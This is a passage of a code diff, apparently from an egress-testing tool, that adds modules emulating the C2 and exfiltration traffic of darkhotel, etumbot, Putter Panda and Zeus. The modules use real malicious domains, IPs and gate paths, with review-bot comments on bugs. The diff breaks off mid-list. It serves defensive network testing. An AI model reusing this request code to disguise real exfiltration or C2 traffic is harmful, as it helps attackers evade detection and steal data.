parent
e02a727151
commit
cbe3fcc0f4
|
@ -48,8 +48,31 @@ if __name__ == "__main__":
|
|||
print
|
||||
sys.exit()
|
||||
|
||||
elif cli_parsed.list_actors:
|
||||
print "[*] Supported malware/APT groups: \n"
|
||||
the_conductor.load_actors(cli_parsed)
|
||||
for name, datatype_module in the_conductor.actor_modules.iteritems():
|
||||
print "[+] " + datatype_module.cli + " - (" +\
|
||||
datatype_module.description + ")"
|
||||
print
|
||||
sys.exit()
|
||||
|
||||
if cli_parsed.server is not None:
|
||||
the_conductor.load_server_protocols(cli_parsed)
|
||||
the_conductor.load_actors(cli_parsed)
|
||||
|
||||
# Check if server module is given threat actor vs. normal server
|
||||
for actor_path, actor_mod in the_conductor.actor_modules.iteritems():
|
||||
|
||||
# If actor module is what is used, search for the server requirement
|
||||
# and load that
|
||||
if actor_mod.cli == cli_parsed.server.lower():
|
||||
|
||||
for full_path, server_actor in the_conductor.server_protocols.iteritems():
|
||||
|
||||
if server_actor.protocol.lower() == actor_mod.server_requirement:
|
||||
server_actor.serve()
|
||||
|
||||
|
||||
for full_path, server in the_conductor.server_protocols.iteritems():
|
||||
|
||||
|
@ -86,3 +109,26 @@ if __name__ == "__main__":
|
|||
print "[*] Error: You either didn't provide a valid datatype or client protocol to use."
|
||||
print "[*] Error: Re-run and use --list-datatypes or --list-clients to see possible options."
|
||||
sys.exit()
|
||||
|
||||
elif cli_parsed.actor is not None:
|
||||
# Load different threat actors/malware
|
||||
the_conductor.load_actors(cli_parsed)
|
||||
|
||||
# Identify the actor to emulate
|
||||
for full_path, actor_variant in the_conductor.actor_modules.iteritems():
|
||||
if actor_variant.cli == cli_parsed.actor.lower():
|
||||
|
||||
# Check if generating data or using data within the actor module
|
||||
if cli_parsed.datatype is not None:
|
||||
the_conductor.load_datatypes(cli_parsed)
|
||||
|
||||
# Generate the data for the actor to exfil
|
||||
for name, datatype_module in the_conductor.datatypes.iteritems():
|
||||
if datatype_module.cli == cli_parsed.datatype.lower():
|
||||
generated_data = datatype_module.generate_data()
|
||||
|
||||
actor_variant.emulate(data_to_exfil=generated_data)
|
||||
|
||||
# Instead, use the exfil data within the module
|
||||
else:
|
||||
actor_variant.emulate()
|
||||
|
|
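Review bot: `generated_data` is bound only inside the `if datatype_module.cli == cli_parsed.datatype.lower():` branch, so when `--datatype` names no loaded module the call `actor_variant.emulate(data_to_exfil=generated_data)` raises a NameError instead of reporting the bad option; an `--actor` value that matches no module likewise falls through the loop and the program ends with no output at all. Initialise `generated_data = None` before the datatype loop and check it afterwards, e.g. `if generated_data is None: print "[*] Error: Unknown datatype, use --list-datatypes"; sys.exit(1)`, and add a matching "unknown actor" error after the actor loop. In the first hunk, the `--server <actor>` branch serves the matching protocol and then still reaches the generic `for full_path, server in the_conductor.server_protocols` loop; that loop's body is outside the hunk, so I cannot tell whether the protocol is served twice — worth a comment either way. The enclosing `if __name__ == "__main__":` block starts before the hunk.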
|
@ -0,0 +1,89 @@
|
|||
'''
|
||||
|
||||
This module generates darkhotel traffic.
|
||||
|
||||
Resources:
|
||||
https://securelist.com/blog/research/66779/the-darkhotel-apt/
|
||||
|
||||
'''
|
||||
|
||||
import random
|
||||
import sys
|
||||
import urllib
|
||||
import urllib2
|
||||
|
||||
|
||||
class Actor:
|
||||
|
||||
def __init__(self, cli_object):
|
||||
self.cli = "darkhotel"
|
||||
self.description = "darkhotel backdoor"
|
||||
self.type = "malware"
|
||||
self.server_requirement = "http"
|
||||
self.egress_server = cli_object.ip
|
||||
self.domains = [
|
||||
'micronaoko.jumpingcrab.com', 'microchsse.strangled.net',
|
||||
'microbrownys.strangled.net', 'microplants.strangled.net',
|
||||
'microlilics.crabdance.com']
|
||||
self.uris = [
|
||||
'/bin/read_i.php?a1=step2-down-b&a2=KJNSDFkjmdfH&a3=SW5mb1N5c0BVc2VyIE1ZQ09NUFVURVJATXlVc2VyICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTMtMTY2N1UgQ1BVIEAgMTYwMEdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgWFAgKFNlcnZpY2UgUGFjayAzKU5ldCBjYXJkIDogMTkyLjE2OC4wLjIgKDEzMzc3MzMxMTMzNyk=&a4=KS',
|
||||
'/bin/read_i.php?a1=step2-down-r&a2=KDYEMDYWM&a3=SW5mb1N5c0BVc2VyIE1ZQ09NUFVURVJATXlVc2VyICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTctMTY2N1UgQ1BVIEAgMTYwMEdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgNyAoU2VydmljZSBQYWNrIDIpTmV0IGNhcmQgOiAxOTIuMTY4LjI1LjIgKDEzMzc3MzMxMTMzNyk=&a4=TR',
|
||||
'/bin/read_i.php?a1=step2-down-u&a2=YEMDGEJEIMD&a3=SW5mb1N5c0BVc2VyIFdvcmtzdGF0aW9uQFNvbm9mRmx5bm4gKDA4NTApQyBQIFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy0xNTBVIENQVSBAIDE2MDBHSHpTeXN0ZW0gT1M6IE1pY3Jvc29mdCBXaW5kb3dzIDguMSAoU2VydmljZSBQYWNrIDEpTmV0IGNhcmQgOiAxOTIuMTY4LjMzLjIgKDEzMzc3MzMxMTMzNyk=&a4=BD',
|
||||
'/bin/read_i.php?a1=step2-down-c&a2=MSNETJ&a3=SW5mb1N5c0BVc2VyIFNFUlZFUkRDQEFETUlOICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTctOTBVIENQVSBAIDIwMDBHSHpTeXN0ZW0gT1M6IE1pY3Jvc29mdCBXaW5kb3dzIDEwIE5ldCBjYXJkIDogMTkyLjE2OC4xMzMuMiAoMTMzNzczMzExMzM3KQ==&a4=AST',
|
||||
'/bin/read_i.php?a1=step2-down-k&a2=VSEJKNEF&a3=SW5mb1N5c0BVc2VyIERCQURCQFNZU0RCQSAoMDg1MClDUFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy05MCBDUFUgQCAzMjAwR0h6U3lzdGVtIE9TOiBNaWNyb3NvZnQgV2luZG93cyBTZXJ2ZXIgMjAwMyBOZXQgY2FyZCA6IDE5Mi4xNjguMTUzLjIgKDEzMzc3MzMxMTMzNyk=&a4=NOD'
|
||||
'/bin/read_i.php?a1=step2-down-j&a2=ALFDOEJNKF&a3=SW5mb1N5c0BVc2VyIERBZG1pbkBEQ1N5cyAoMDk1MClDUFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy05MDAgQ1BVIEAgMzgwMUdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgU2VydmVyIDIwMDggTmV0IGNhcmQgOiAxOTIuMTY4LjE5My4yICgxMzM3NzMzMTEzMzcp&a4=NV']
|
||||
self.checkin_domains = [
|
||||
'autolace.twilightparadox.com', 'automachine.servequake.com']
|
||||
|
||||
def emulate(self, data_to_exfil=None):
|
||||
|
||||
# headers that are used in get requests
|
||||
darkhotel_headers = {
|
||||
"User-Agent": " Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)",
|
||||
"Connection": "Keep-Alive",
|
||||
"Cache-Control": "no-cache",
|
||||
}
|
||||
|
||||
selected_checkin_domain = random.choice(self.checkin_domains)
|
||||
darkhotel_headers['Host'] = selected_checkin_domain
|
||||
|
||||
get_request = urllib2.Request(
|
||||
"http://" + self.egress_server + "/major/images/view.php",
|
||||
headers=darkhotel_headers)
|
||||
|
||||
try:
|
||||
urllib2.urlopen(get_request)
|
||||
except urllib2.URLError:
|
||||
print "[*] Error: Cannot connect to darkhotel data exfil server!"
|
||||
print "[*] Error: Possible firewall, or proxy prventing this?"
|
||||
sys.exit(1)
|
||||
|
||||
get_request2 = urllib2.Request(
|
||||
"http://" + self.egress_server + "/major/txt/read.php",
|
||||
headers=darkhotel_headers)
|
||||
|
||||
try:
|
||||
urllib2.urlopen(get_request2)
|
||||
except urllib2.URLError:
|
||||
print "[*] Error: Cannot connect to darkhotel data exfil server!"
|
||||
print "[*] Error: Possible firewall, or proxy prventing this?"
|
||||
sys.exit(1)
|
||||
|
||||
# Iterate over get and post request 5 times
|
||||
for times_requested in xrange(1, 6):
|
||||
selected_domain = random.choice(self.domains)
|
||||
darkhotel_headers['Host'] = selected_domain
|
||||
darkhotel_uri = random.choice(self.uris)
|
||||
|
||||
get_req2 = urllib2.Request(
|
||||
"http://" + self.egress_server + darkhotel_uri, headers=darkhotel_headers)
|
||||
|
||||
try:
|
||||
urllib2.urlopen(get_req2)
|
||||
except urllib2.URLError:
|
||||
print "[*] Error: Cannot connect to darkhotel data exfil server!"
|
||||
print "[*] Error: Possible firewall, or proxy prventing this?"
|
||||
print "URI == " + darkhotel_uri
|
||||
|
||||
print "[*] INFO: DarkHotel C2 comms complete!"
|
||||
return
|
|
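Review bot: The `self.uris` literal is missing a comma after the `'...&a4=NOD'` entry, so Python's implicit string concatenation silently joins it with the following `'/bin/read_i.php?a1=step2-down-j...'` entry into one malformed URI and the list holds five items instead of six; fix is `'...&a4=NOD',`. The `data_to_exfil` parameter of `emulate` is accepted but never sent (the method only issues GETs), so callers that pass `--datatype` output get nothing exfiltrated; either POST it as the putterpanda and zeus actors do or state this in a docstring, e.g. `"""Replay darkhotel check-in and read_i.php GETs; data_to_exfil is currently ignored."""`. `import urllib` is unused, and the `User-Agent` value starts with a stray space. Inside the loop a failed request prints the error but, unlike the two check-in requests above it, does not exit; if that is deliberate a one-line comment saying so would prevent someone "fixing" it.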
@ -0,0 +1,96 @@
|
|||
'''
|
||||
|
||||
This module generates etumbot traffic.
|
||||
|
||||
Resources:
|
||||
https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/etumbot.profile
|
||||
|
||||
'''
|
||||
|
||||
import random
|
||||
import sys
|
||||
import urllib2
|
||||
|
||||
|
||||
class Actor:
|
||||
|
||||
def __init__(self, cli_object):
|
||||
self.cli = "etumbot"
|
||||
self.description = "etumbot backdoor"
|
||||
self.type = "malware"
|
||||
self.server_requirement = "http"
|
||||
self.egress_server = cli_object.ip
|
||||
self.domains = [
|
||||
'200.27.173.58', '200.42.69.140', '92.54.232.42', '133.87.242.63',
|
||||
'98.188.111.244', 'intro.sunnyschool.com.tw', '143.89.145.156',
|
||||
'198.209.212.82', '143.89.47.132', '196.1.199.15',
|
||||
'wwap.publiclol.com', '59.0.249.11', '190.16.246.129',
|
||||
'211.53.164.152', 'finance.yesplusno.com']
|
||||
self.encoded_string = [
|
||||
'dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ--',
|
||||
'Y2F0Y2hldHVtYm90aWZ5b3VjYW4-',
|
||||
'Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24-',
|
||||
'bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA--',
|
||||
'd2h5aXNwZW5uc3RhdGVzb2JhZGF0Zm9vdGJhbGw-',
|
||||
'U2VtaW5vbGVzd291bGRkZXN0cm95cGVubnN0YXRl',
|
||||
'dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM-',
|
||||
'bm90cmVkYW1lY2hlYXRzdG93aW4-',
|
||||
'dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l',
|
||||
'YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy']
|
||||
self.post_data = [
|
||||
{'etumbot_id': 'uid=0(root) gid=0(root) groups=0(root)'},
|
||||
{'etumbot_whoami': 'root'}, {'etumbot_dir': 'C:\\, C:\\Windows'},
|
||||
{'etumbot_ps': 'svchost.exe, spoolsvc.exe, explorer.exe, iexplorer.exe'},
|
||||
{'etumbot_ipconfig': '192.168.1.83 255.255.255.0 192.168.1.1'},
|
||||
{'etumbot_ping': 'google.com time=11.6, 19.1, 12.8, 20'}]
|
||||
self.uris = [
|
||||
'/image/' + random.choice(self.encoded_string) + '.jpg',
|
||||
'/history/' + random.choice(self.encoded_string) + '.asp',
|
||||
'/manage/asp/item.asp?id=' + random.choice(self.encoded_string) + '&&mux=' + random.choice(self.encoded_string),
|
||||
'/article/30441/Review.asp?id=' + random.choice(self.encoded_string) + '&&date=' + random.choice(self.encoded_string),
|
||||
'/tech/s.asp?m=' + random.choice(self.encoded_string)]
|
||||
|
||||
def emulate(self, data_to_exfil=None):
|
||||
|
||||
# headers that are used in get requests
|
||||
etumbot_headers = {
|
||||
"User-Agent": "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)",
|
||||
"Connection": "Keep-Alive",
|
||||
"Referrer": "http://www.google.com/",
|
||||
"Pragma": "no-cache",
|
||||
"Cache-Control": "no-cache",
|
||||
"Accept": "text/html,application/xhtml+xml,application/xml,q=0.9,*/*;q=0.8"
|
||||
}
|
||||
|
||||
selected_domain = random.choice(self.domains)
|
||||
etumbot_headers['Host'] = selected_domain
|
||||
|
||||
get_request = urllib2.Request(
|
||||
"http://" + self.egress_server + "/home/index.asp?typeid=13",
|
||||
headers=etumbot_headers)
|
||||
|
||||
try:
|
||||
urllib2.urlopen(get_request)
|
||||
except urllib2.URLError:
|
||||
print "[*] Error: Cannot connect to etumbot data exfil server!"
|
||||
print "[*] Error: Possible firewall, or proxy prventing this?"
|
||||
sys.exit(1)
|
||||
|
||||
# Iterate over get and post request 5 times
|
||||
for times_requested in xrange(1, 6):
|
||||
selected_domain = random.choice(self.domains)
|
||||
etumbot_headers['Host'] = selected_domain
|
||||
etumbot_uri = random.choice(self.uris)
|
||||
|
||||
get_req2 = urllib2.Request(
|
||||
"http://" + self.egress_server + etumbot_uri, headers=etumbot_headers)
|
||||
|
||||
try:
|
||||
urllib2.urlopen(get_req2)
|
||||
except urllib2.URLError:
|
||||
print "[*] Error: Cannot connect to etumbot data exfil server!"
|
||||
print "[*] Error: Possible firewall, or proxy prventing this?"
|
||||
print "URI == " + etumbot_uri
|
||||
|
||||
print "[*] INFO: Etumbot C2 comms complete!"
|
||||
return
|
|
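Review bot: Two header values in `etumbot_headers` are malformed: the request header is spelled `Referer` in HTTP, so `"Referrer"` is sent as an unrecognised extra header, and the `Accept` value uses a comma where a semicolon is needed before the quality parameter — `"Referer": "http://www.google.com/",` and `"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"`. As in the darkhotel module, `emulate` accepts `data_to_exfil` but only issues GETs, so the `# Iterate over get and post request 5 times` comment is inaccurate and the parameter should be documented as ignored or actually posted. `self.uris` is rendered once in `__init__` with `random.choice(self.encoded_string)`, so all five loop iterations pick among the same five pre-built strings; a comment on the list (`# rendered once per instance; the loop varies only which of these is used`) would make that intent explicit.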
@ -0,0 +1,108 @@
|
|||
'''
|
||||
|
||||
This module generates putterpanda traffic.
|
||||
|
||||
Resources:
|
||||
http://blog.crowdstrike.com/hat-tribution-pla-unit-61486/
|
||||
https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/putter.profile
|
||||
|
||||
'''
|
||||
|
||||
import random
|
||||
import sys
|
||||
import urllib
|
||||
import urllib2
|
||||
|
||||
|
||||
class Actor:
|
||||
|
||||
def __init__(self, cli_object):
|
||||
self.cli = "putterpanda"
|
||||
self.description = "Putter Panda APT"
|
||||
self.type = "malware"
|
||||
self.server_requirement = "http"
|
||||
self.egress_server = cli_object.ip
|
||||
self.domains = [
|
||||
'ctable.org', 'gamemuster.com', 'kyoceras.net', 'nestlere.com',
|
||||
'raylitoday.com', 'renewgis.com', 'siseau.com', 'bmwauto.org',
|
||||
't008.net', 'vssigma.com', 'anyoffice.info', 'it-bar.net',
|
||||
'jj-desk.com', 'satelliteclub.info', 'space-today.info',
|
||||
'sst1.info', 'stream-media.info', 'webfilestore.net']
|
||||
self.post_data = [
|
||||
{'putterpanda_id': 'uid=0(root) gid=0(root) groups=0(root)'},
|
||||
{'putterpanda_whoami': 'root'}, {'putterpanda_dir': 'C:\\, C:\\Windows'},
|
||||
{'putterpanda_ps': 'svchost.exe, spoolsvc.exe, explorer.exe, iexplorer.exe'},
|
||||
{'putterpanda_ipconfig': '192.168.1.83 255.255.255.0 192.168.1.1'},
|
||||
{'putterpanda_ping': 'google.com time=11.6, 19.1, 12.8, 20'}]
|
||||
self.encoded_hostnames = [
|
||||
'SG9tZVBD', 'Q29tcGFueVdvcmtzdGF0aW9u',
|
||||
'd29ya3N0YXRpb24tMTMy', 'UHJpbWFyeURvbWFpbkNvbnRyb2xsZXI=',
|
||||
'ZmlsZXNlcnZlcg==', 'd2Vic2VydmVy', 'RE5Tc2VydmVyMg==',
|
||||
'Yml0c3kubWl0LmVkdQ==', 'c2VydmVyMS5jaWEuZ292',
|
||||
'ZXZpZGVuY2UuZmJpLmdvdg==', 'ZGIuc3NhLmdvdg==',
|
||||
'cGlpLmZkYS5nb3Y=', 'ZGF0YS5mZGEuZ292']
|
||||
self.uris = [
|
||||
'/search5' + str(self.gen_numbers()) + '?h1=' + str(self.gen_numbers(num=2)) + '&h2=' + random.choice('13') + '&h3=' + str(self.gen_numbers(num=6)) + '&h4=' + self.random_letters(),
|
||||
'/microsoft/errorpost/default/connect.aspx?ID=' + str(self.gen_numbers()),
|
||||
'/MicrosoftUpdate/ShellEX/KB' + str(self.gen_numbers(num=7)) + '/default.aspx?tmp=' + random.choice(self.encoded_hostnames),
|
||||
'/microsoft/errorpost/default.aspx?ID=' + str(self.gen_numbers()),
|
||||
'/MicrosoftUpdate/GetUpdate/KB' + str(self.gen_numbers(num=7)) + '/default.asp?tmp=' + random.choice(self.encoded_hostnames),
|
||||
'/MicrosoftUpdate/GetFiles/KB' + str(self.gen_numbers(num=7)) + '/default.asp?tmp=' + random.choice(self.encoded_hostnames),
|
||||
'/MicrosoftUpdate/WWRONG/KB' + str(self.gen_numbers(num=7)) + '/default.asp?tmp=' + random.choice(self.encoded_hostnames)]
|
||||
|
||||
|
||||
def emulate(self, data_to_exfil=None):
|
||||
|
||||
# headers that are used in get requests
|
||||
putter_headers = {
|
||||
"Accept": "*/*",
|
||||
"Connection": "Keep-Alive",
|
||||
"User-Agent": "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||||
}
|
||||
|
||||
# Iterate over get and post request 5 times
|
||||
for times_requested in xrange(1, 6):
|
||||
selected_domain = random.choice(self.domains)
|
||||
putter_headers['Host'] = selected_domain
|
||||
putter_uri = random.choice(self.uris)
|
||||
|
||||
# Determining which data is being sent out by agent
|
||||
if data_to_exfil is None:
|
||||
posted_data = random.choice(self.post_data)
|
||||
else:
|
||||
posted_data = {'putterpanda_data': data_to_exfil}
|
||||
|
||||
# UrlEncode and send the data out
|
||||
posted_data = urllib.urlencode(posted_data)
|
||||
post_req = urllib2.Request(
|
||||
"http://" + self.egress_server + putter_uri, posted_data, headers=putter_headers)
|
||||
|
||||
try:
|
||||
urllib2.urlopen(post_req)
|
||||
except urllib2.URLError:
|
||||
print "[*] Error: Cannot connect to putter panda data exfil server!"
|
||||
print "[*] Error: Possible firewall, or proxy prventing this?"
|
||||
sys.exit(1)
|
||||
|
||||
print "[*] INFO: PutterPanda C2 comms complete!"
|
||||
|
||||
return
|
||||
|
||||
def gen_numbers(self, num=5):
|
||||
if num == 5:
|
||||
return random.randint(10000, 99999)
|
||||
elif num == 2:
|
||||
return random.randint(10, 99)
|
||||
elif num == 6:
|
||||
return random.randint(100000, 999999)
|
||||
elif num == 7:
|
||||
return random.randint(1000000, 9999999)
|
||||
else:
|
||||
print "odd error?"
|
||||
sys.exit()
|
||||
return
|
||||
|
||||
def random_letters(self, total=24):
|
||||
random_string = ''.join(
|
||||
random.choice('ABCDEFGHIJKLMNOP') for x in range(total))
|
||||
return random_string
|
|
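Review bot: `gen_numbers` terminates the whole process from a helper when called with a width it does not know (`print "odd error?"` then `sys.exit()`), and the `if/elif` chain only covers 2, 5, 6 and 7 digits; a general form is shorter and raises a proper error instead: `if num < 1: raise ValueError("num must be >= 1")` followed by `return random.randint(10 ** (num - 1), 10 ** num - 1)`, which returns the same ranges for the four existing widths. The trailing `return` after `sys.exit()` is unreachable. A docstring on both helpers would help (`"""Return a random integer with exactly `num` decimal digits."""` and `"""Return `total` random uppercase letters from A-P."""`). As in etumbot, `self.uris` is rendered once in `__init__`, so the five loop iterations reuse the same seven pre-built strings; state that in a comment if it is intended.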
@ -0,0 +1,279 @@
|
|||
'''
|
||||
|
||||
This module generates Zeus traffic.
|
||||
|
||||
Resources:
|
||||
https://zeustracker.abuse.ch/blocklist.php
|
||||
https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/crimeware/zeus.profile
|
||||
|
||||
'''
|
||||
|
||||
import random
|
||||
import sys
|
||||
import urllib
|
||||
import urllib2
|
||||
|
||||
|
||||
class Actor:
|
||||
|
||||
def __init__(self, cli_object):
|
||||
self.cli = "zeus"
|
||||
self.description = "Zeus Malware"
|
||||
self.type = "malware"
|
||||
self.server_requirement = "http"
|
||||
self.egress_server = cli_object.ip
|
||||
self.domains = [
|
||||
'0x.x.gg', '6pjddrtt7.com', 'apexholdngs.com', 'baoshlda.com',
|
||||
'bestdove.in.ua', 'championbft.com', 'codedtunes.zapto.org',
|
||||
'cooldomainname.ws', 'danislenefc.info', 'dau43vt5wtrd.tk',
|
||||
'diosdelared.com.mx', 'emaillifecoaching.com.au', 'emekonline.tk',
|
||||
'eresimgbo.com', 'escoesco.info', 'fileserver03.com',
|
||||
'finsolutions.top', 'fronty2073.net', 'genmjob3.ru',
|
||||
'gjiayimeiya.com', 'gorainbowzone.tk', 'hope-found-now.net',
|
||||
'hruner.com', 'hui-ain-apparel.tk', 'ice.ip64.net',
|
||||
'interglobalswiss.info', 'jomo.in.ua', 'juyteche.tk',
|
||||
'kesikelyaf.com', 'legitvendors.ru', 'lion.web2.0campus.net',
|
||||
'liveresellerweb.eu', 'mccc-investconsultant.com' 'muazymaur.tk',
|
||||
'mymytonnymaxltd.org', 'mypic.hopto.org', 'mystartap.com',
|
||||
'neease.com', 'ns513726.ip-192-99-148.net',
|
||||
'panel.vargakragard.se', 'polyaire-au.com',
|
||||
'projects.globaltronics.net', 'regame.su', 'richus.ru',
|
||||
'server.bovine-mena.com', 'ssl.sinergycosmetics.com',
|
||||
'sslsam.com', 'sus.nieuwmoer.info', 'tesab.org.uk',
|
||||
'up.frigo2000.it', 'update.odeen.eu', 'update.rifugiopontese.it',
|
||||
'urchilaa.com', 'winscoft.com', 'www.nikey.cn',
|
||||
'www.riverwalktrader.co.za', 'www.witkey.com', 'zabava-bel.ru']
|
||||
self.post_data = [
|
||||
{'zeus_id': 'uid=0(root) gid=0(root) groups=0(root)'},
|
||||
{'zeus_whoami': 'root'}, {'zeus_dir': 'C:\\, C:\\Windows'},
|
||||
{'zeus_ps': 'svchost.exe, spoolsvc.exe, explorer.exe, iexplorer.exe'},
|
||||
{'zeus_ipconfig': '192.168.1.15 255.255.255.0 192.168.1.1'},
|
||||
{'zeus_ping': 'google.com time=13.6, 15.1, 19.8, 20'}]
|
||||
self.uris = [
|
||||
'/jm32/includes/site/bot.exe', '/jm32/includes/site/config.bin',
|
||||
'/jm32/includes/site/gate.php', '/mathew/config.jpg',
|
||||
'/docs/.docs/config.jpg', '/docs/.docs/do.php',
|
||||
'/zeujuus/a/gate.php', '/zeujuus/a/modules/bot.exe',
|
||||
'/zeujuus/a/modules/config.bin',
|
||||
'/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php',
|
||||
'/zejius/2HZG41Zw/bot.exe',
|
||||
'/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin',
|
||||
'/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php',
|
||||
'/zejius/5GPR0iy9/bot.exe',
|
||||
'/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin', '/past/config.jpg',
|
||||
'/past/gate.php', '/fan/base/config.jpg',
|
||||
'/wp-includes/pomo/panel/config.jpg',
|
||||
'/wp-includes/pomo/panel/gate.php', '/themes/panel/config.jpg',
|
||||
'/themes/panel/gate.php', '/home/libraries/joomla/php/gate.php',
|
||||
'/home/plugins/system/tmp/bot.scr',
|
||||
'/home/plugins/system/tmp/config.bin',
|
||||
'/home/plugins/system/tmp/gate.php', '/js/ssj/config.jpg',
|
||||
'/js/ssj/gate.php', '/site/tmp/xml/config.jpg',
|
||||
'/site/tmp/xml/gate.php', '/news/wpg.php', '/file.php',
|
||||
'/.cgi-bin./as.bin', '/wp-content/themes/bmw_lab/new.ban',
|
||||
'/wp-content/themes/bmw_lab/newnew.wav', '/vs/panel/config.jpg',
|
||||
'/vs/panel/gate.php', '/brand/server/file.php',
|
||||
'/brand/server/gate.php',
|
||||
'/wp-admin/css/colors/sunrise/admin/bot.exe',
|
||||
'/wp-admin/css/colors/sunrise/admin/config.bin',
|
||||
'/wp-admin/css/colors/sunrise/admin/secure.php',
|
||||
'/wp-content/themes/chagim/library/images/plates/bot.exe',
|
||||
'/wp-content/themes/chagim/library/images/plates/config.bin',
|
||||
'/wp-content/themes/chagim/library/images/plates/gate.php',
|
||||
'/images/burr_insurance001001.php', '/images/team/config.jpg',
|
||||
'/images/team/gate.php', '/test/config.jpg', '/test/gate.php',
|
||||
'/ray/server/file.php', '/ray/server/gate.php', '/capa.bin',
|
||||
'/capa.exe', '/secure.php', '/ral/30/config.bin',
|
||||
'/ral/30/secure.php', '/wp-admin/css/config.bin',
|
||||
'/wp-admin/css/gate.php', '/wp-admin/css/setup.exe',
|
||||
'/panel/config.jpg', '/panel/gate.php',
|
||||
'/wp-includes2/SimplePie/Net/page/config.jpg',
|
||||
'/wp-includes2/SimplePie/Net/page/gate.php',
|
||||
'/includes/.srv/srv/bot.exe',
|
||||
'/includes/.srv/srv/config.bin', '/includes/.srv/srv/gate.php',
|
||||
'/ric/30/config.bin', '/ric/30/secure.php', '/blog/crea.bin',
|
||||
'/blog/crea.exe', '/blog/secure.php', '/images2/dave.jpg',
|
||||
'/images2/gate.php', '/wp-includes/ID3/config.jpg',
|
||||
'/wp-includes/ID3/gate.php', '/emman/panel/config.jpg',
|
||||
'/emman/panel/gate.php', '/xampp/img/escu.bin',
|
||||
'/xampp/img/escu.exe', '/xampp/img/secure.php',
|
||||
'/.css/config.jpg', '/.css/gate.php', '/admin/cfg.bin',
|
||||
'/admin/gate.php', '/isai/modules/mod_upgrade/bot.exe',
|
||||
'/isai/modules/mod_upgrade/config.bin',
|
||||
'/isai/modules/mod_upgrade/gate.php', '/wp-comment/firs.jpg',
|
||||
'/wp-comment/gate.php', '/panel/file.php', '/panel/gate.php',
|
||||
'/images01/fong.bin', '/images01/fong.exe', '/images01/gate.php',
|
||||
'/img/vg.php', '/components/com_file/file.php',
|
||||
'/components/com_file/gate.php', '/images/panel/config.jpg',
|
||||
'/images/panel/gate.php', '/wordpress/gate.php',
|
||||
'/wordpress/gree.jpg', '/media/.tmp/file.php',
|
||||
'/media/.tmp/gate.php', '/gate.php', '/modules/holl.bin',
|
||||
'/modules/holl.exe', '/templates/admin/install/config.jpg',
|
||||
'/templates/admin/install/gate.php',
|
||||
'/tmp/admin/install/config.jpg', '/tmp/admin/install/gate.php',
|
||||
'/tmp/cp/config.jpg', '/tmp/cp/gate.php',
|
||||
'/tmp/install/config.jpg', '/tmp/install/gate.php',
|
||||
'/frank/panel/config.jpg', '/frank/panel/gate.php',
|
||||
'/tmp/configs/new/vg.php', '/meask/lite/file.php',
|
||||
'/meask/lite/gate.php', '/css/src/admin/config.jpg',
|
||||
'/css/src/admin/gate.php', '/js/admin/install/config.jpg',
|
||||
'/js/admin/install/gate.php',
|
||||
'/wp-content/plugins/wp-db-backup-made/work.php',
|
||||
'/update/bot.exe', '/update/cfg.bin', '/update/gate.php',
|
||||
'/chopinschumann/ital.bin', '/chopinschumann/ital.exe',
|
||||
'/chopinschumann/secure.php', '/images/ital.bin',
|
||||
'/images/ital.exe', '/images/secure.php',
|
||||
'/compose/panel/bot.exe', '/compose/panel/config.bin',
|
||||
'/compose/panel/secure.php', '/fy97/panel/config.bin',
|
||||
'/fy97/panel/secure.php', '/images/joea.bin', '/images/joea.exe',
|
||||
'/images/secure.php', '/components/com_joomla/plugin/config.jpg',
|
||||
'/components/com_joomla/plugin/gate.php',
|
||||
'/resource/css/config.bin', '/resource/css/secure.php',
|
||||
'/wp-content/upgrade/PANEL/config.jpg',
|
||||
'/wp-content/upgrade/PANEL/gate.php',
|
||||
'/wp-content/plugins/bcet56aoikqf52iu/food.php',
|
||||
'/Scripts/_notes/build/bot.exe',
|
||||
'/Scripts/_notes/build/config.bin',
|
||||
'/Scripts/_notes/build/gate.php', '/REMOVED/.pop/bot.exe',
|
||||
'/REMOVED/.pop/config.bin', '/REMOVED/.pop/gate.php',
|
||||
'/KINS/panel/bot.exe', '/KINS/panel/config.jpg',
|
||||
'/KINS/panel/gate.php', '/panel/config.jpg', '/panel/gate.php',
|
||||
'/walex/files/bot.exe', '/walex/files/config.jpg',
|
||||
'/walex/files/gate.php', '/e7/bot.exe', '/e7/cfg.bin',
|
||||
'/e7/gate.php',
|
||||
'/wp-admin/css/colors/coffee/cat/server/config.jpg',
|
||||
'/wp-admin/css/colors/coffee/cat/server/gate.php',
|
||||
'/site/S/13897652/5112/file.php',
|
||||
'/site/S/13897652/5112/gate.php',
|
||||
'/images/js/osomo/panel/config.jpg',
|
||||
'/images/js/osomo/panel/gate.php',
|
||||
'/themes/panel/config.jp', '/themes/panel/gate.php',
|
||||
'/system/eusat/telesa/config.jpg', '/sadcxvbv/vdfbffddf.php',
|
||||
